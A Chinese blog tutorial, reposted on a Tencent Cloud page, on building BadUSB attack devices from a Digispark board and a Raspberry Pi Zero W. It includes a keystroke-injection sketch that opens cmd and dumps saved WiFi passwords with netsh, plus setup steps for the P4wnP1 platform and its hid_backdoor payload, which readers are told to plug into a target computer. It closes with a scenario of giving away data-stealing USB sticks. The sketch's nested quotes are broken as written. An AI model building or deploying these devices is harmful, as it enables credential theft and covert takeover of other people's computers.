打造属于自己的渗透神器 第二篇

本文作者:98

上次打造的渗透神器大家喜不喜欢呀,地址:打造属于自己的渗透神器

今天我又给大家带来了新的一篇打造一个属于自己的渗透神器,之前在浏览视频的时候看到一部视频就是讲这个的今天我们就一起试一下。

badusb 是什么?(以下教程据有攻击性,请妥当使用)

通过硬件直接插入对方电脑,让对方电脑执行代码,达到干扰、控制主机或者窃取信息等目的。

他的是干什么的?

他可以进行 HID 攻击。

HID 是 Human Interface Device 的缩写,由其名称可以了解 HID 设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过 HID 设备并不一定要有人机接口,只要符合 HID 类别规范的设备都是 HID 设备。一般来讲针对 HID 的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。

也就是模仿人在在操控鼠标键盘等等,他的危险就在于他的一些软件根本就检测不出来他是在执行一些命令。

准备工作

1、digispark 开发板 9¥

2、树莓派 zero w (无线版本) 100+$

3、读卡器 15+$

4、OTG 线 10+¥

5、16G 内存卡 45¥

6、迷你 HDMI 转标准 HDMI 3¥

就这些了今天这篇文章分两个章节分别介绍

Digispark

这里需要几个软件

  • Digispark ATtiny 85
  • Arduino IDE(烧录软件)
  • Digispark (驱动程序)
  • Automator(编程)

先配置 Arduino IDE:

https://www.arduino.cc/en/Main/Software

打开 文件->首选项

把这个网址添加到附加开发板管理网址:

https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json

点击好之后,再点击工具打开,再打开开发板:xxxxxxxx,再打开开发板管理

在上面搜索: Digistump AVR Boards 下载 (出现 INSTALLED 就可以了)

下载好了就关闭他。

接下来打开工具选择开发板选项在里面找到 Digispark ATtiny(Defauit --16.5)确认。在选择文件选择示例中找到 Digispark Keyboars 之后选择 keyborad。

在选择工具下面有一个编辑器选择:usb tiny isp 就可以了在点击烧录键

读完就可以插入 Digispark 在你看到谢谢的时候就安装好了,里面的代码是可以修改的根据你自己的想法来编程。

安装 windows 驱动

打开网页:

https://github.com/digistump/DigistumpArduino/releases

下载完成解压后执行 Install Drivers.exe 即可

记住所有 usb 选项都要打对号这样就可以了

我们需要下载一个工具把我们输入键盘指令变成 Digispark ATtiny 他能读懂的。

工具地址:

https://github.com/CYRO4S/Automator

这里就是生成 Digispark 能运行的代码,看你自己想怎么搞。

作者想写一个打开计算器的命令

代码解释:

1、延迟 1 秒让电脑读取

2、使用左 GUI(键盘上面的旗帜)在加 R(win 的打开快捷键)

3、延迟 0.5 秒

4、再输入 cmd

5、再延迟 0.5 秒

6、再按确定键

7、再延迟 0.5 秒

8、输入打开计算器命令

9、确定

这就是一个简单的演示,为什么要有延迟?你输入太快可能电脑读不出来。

接下来按生成。他的文件名字后缀为 .ion,接下来把他用编程软件打开在复制里面的代码,再复制到 Arduino 里面上传就可以了

然后你就可以很愉快的使用了。

作者写了一个找出 WiFi 密码的命令

include "DigiKeyboard.h"

void setup() {

DigiKeyboard.sendKeyStroke(0);               

DigiKeyboard.delay(1000);

DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);

DigiKeyboard.print("cmd");

DigiKeyboard.delay(500);

DigiKeyboard.sendKeyStroke(KEY_ENTER);

DigiKeyboard.delay(500);

DigiKeyboard.print("netsh wlan show profiles");

DigiKeyboard.delay(500);

DigiKeyboard.sendKeyStroke(KEY_ENTER);

DigiKeyboard.delay(500);

DigiKeyboard.print("netsh wlan show profile name="WiFissid" key=clear");

DigiKeyboard.sendKeyStroke(KEY_ENTER);

}

void loop() {

}

前提是别人要开启无线网络,也是就他正在无线连接里面的 WiFissid 就是你要找的 WiFi 的名字。

视频内容

我拍了一段视频给你大家看看效果

当 Digispark 插入电脑的时候你会听到一声 d=====( ̄▽ ̄*)b,这个声音就是在安装驱动程序程序正在正常启动中。大家是不是觉得这个 Digispark 只能运行一次我们编程的程序,不够过瘾想搞其他东西,没错我就是在等你这句话接下来介绍高级版的 badusb。

树莓派 W 做一个高级版 badusb

准备工作

1、下载系统

2、树莓派 zero w (无线版本)

3、读卡器

4、OTG 线

5、16G 内存卡

6、迷你 HDMI 转标准

7、远程登入 SSH 软件 PUTTY(win)JuiceSSH(安卓)

渗透工具第一篇有讲用什么刷入系统大家去找一下就可以了

刷完在 boot 分区新建一个 ssh 文件就可以了,千万不要在建一个自动连接 WiFi 的文件,有可能你后面软件会不兼容卡掉。

这个时候你就把迷你 HDMI 转标准插入树莓派连接显示器或者你有 usb 口的网口那就插路由器看 ip 显示器的直接连接就可以了。

ssh 连接,账号 pi 密码 raspberry

接下来配置与下载(命令手打比较好,复制有可能会出错)(有提示你 y 你就直接 yes 过去)

apt-get update

sudo apt-getupdate

sudo apt-get install git john

git clone --recursive http://github.com/mame82/P4wnP1

下载完成

cd P4wnP1/

./install.sh

sudo reboot

安装时间是有的长的,作者安装了 40 分钟

安装好后他会出现上面这个

重新启动一下,你会发现他发送一个 WiFi 名字叫做 P4wnP1, 密码是 MaMe82-P4wnP1,ssh 登入的地址也变了 172.24.0.1

登入账号还是 pi 和 raspberry。

等你登入进去输入 nano setup.cfg 进行配置文件修改

刚开始的时候 playload=network_only.txt 前面加上 #

每次只能执行一个 payload

然后选择执行的 payload 即可(去掉注释即可执行 payload)

比如选择 hid_backdoor 的话就去去掉 #PAYLOAD=hid_backdoor_remote.txt 前面的 # 号

(借用喵神的一张图,我的不小心删除了)

(作者本来是安装好了准备修改这个文件结果手误把这个文件全部删除了!所以我又重新安装了一次,所以有些图我没有放出来,希望大家见谅)退出保存

把树莓派 w 连接你要攻击的电脑就可以了

树莓派有 2 个 usb 口一个是电源接口一个是数据接口,把 usb 口接在被攻击者的电脑上面就可以使用 P4wnP1 了。

接下来我们介绍一下 P4wnP1 是干什么的?

p4wnp1 是一个高度可定制的 USB 攻击平台,基于低成本的 Raspberry Pi 的零或零 W(Raspberry Pi 所隐藏的后门)。

项目地址:

https://github.com/mame82/P4wnP1

他官网介绍的很详细,作者就不在介绍了(里面内容太多比如拿电脑的 shell,获取 win 登入密码等等)。

最后给大家看看一个作者拍的 P4wnP1 使用的视频。(作者名字叫喵神已经得到他的授权)

http://v.youku.com/v_show/id_XMzA2MTkwNDE2NA==.html

我相信大家看完以后,就会觉得现在的手法越来越牛逼。

最后感谢 2 位作者对我的教导(无序熵增和喵神)真的非常感谢你们

强调几个问题也是作者遇到的问题

1、树莓派刷入系统的时候在 boot 分区新建一个 SSH 不要建 WPA 自动连接 WiFi 密码的文件,有一定几率会安装 P4wnP1 不成功

2.、供电要稳定

3、一些工具下载可能会有问题,需要自己有梯或者用手机流量下载

4、digispark 烧录过程中千万不要拔下来

5、在使用烧录软件的时候一定要检测你的配置 ok 不

6、在使用 Automator 的时候一定要记住给一点延迟给程序

7、生成的 Automator 文件一定要在专业的编程软件中打开在复制到烧录软件里面

总结

到底是使用 9 块钱的 digispark 还是树莓派 W 那还是看自己的需求,如果只是执行一些简单的程序那这个 digispark 非常的适合你。如果你是需要多元化和执行一些复杂的程序那就树莓派 W 适合你,毕竟 2 个开发板的价格摆在这里,badusb 攻击为什么一些安全软件不能及时的阻挡呢?原因就在于他是在模仿键盘和鼠标输入一些安全软件没有办法识别出到底是人还是程序在输入,所以就导致了安全软件认为是人在输入一些指令就让他通过了。这个手法告诉我们黑客不一定要远程入侵你的电脑,他们也可以使用物理接触进行攻击,对于企业来说这种攻击手法比远程入侵简单多了成功率可能也会高很多,比如我在你们公司附近搞一个活动送 U 盘,你们公司的人拿回去就插上使用。如果刚好使用的人是财务部门和人事部门,在如果这个 U 盘写的是收集这个电脑全部信息在发送给入侵者,想想就觉得可怕一些在平常不过的东西,却会如此的致命。

原文发布于微信公众号 - 信安之路(xazlsec)

原文发表时间:2018-03-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏進无尽的文章

基础篇-iOS后台运行以及相关

对于APP的前后台运行情况的了解,有助于我们在实际开发中规避一些问题,以及采取稳妥的方法处理和解决问题,是很必须的。

69310
来自专栏Python中文社区

QQ空间爬虫最新分享,一天 400 万条数据

前言 本文为作者对其开源项目QQSpider的说明文档。主要替换了程序里一些不可用的链接,对登录时的验证码作了处理,对去重队列作了优化。并且可以非常简单地实现爬...

54270
来自专栏腾讯云安全的专栏

你熟悉的Android Root 方式有哪些?|附演示视频

30150
来自专栏SAP最佳业务实践

SAP最佳业务实践:无变式配置按订单生产(148)-4分组件的零件生产

image.png 1、分组件的库存采购 在实际业务情况中,原材料通常从外部供应商处购得(可包括在标准采购处理中)。 半成品S224包含原材料R124。 您可...

32180
来自专栏晨星先生的自留地

物理入侵之你真的敢用的我的U盘么?

41930
来自专栏魏艾斯博客www.vpsss.net

更换 sitemap 插件为 Google XML Sitemaps 及相关设置过程

26120
来自专栏木可大大

我的Mac应用清单

相信大家或多或少都会碰到这种问题:Mac到底有什么好的,同样或者更低的价钱,我可以买一个配置更好的Windows电脑了。首先,Mac系统是基于Unix系统的,因...

25330
来自专栏木可大大

我的Mac应用清单

相信大家或多或少都会碰到这种问题:Mac到底有什么好的,同样或者更低的价钱,我可以买一个配置更好的Windows电脑了。首先,Mac系统是基于Unix系统的,因...

20810
来自专栏coding

yii2实战之初见端倪PHP框架大PK安装yii2项目初始化配置服务小结

16150
来自专栏菩提树下的杨过

javascript读写本机文本文件

近日在工作中遇到了一个情况:一张纯html的网页,用它一条一条输入数据,然后由JS运算出结果(这些数据多半都是临时的,所以也没考虑保存到数据库),每次用完后换台...

25070

扫码关注云+社区

领取腾讯云代金券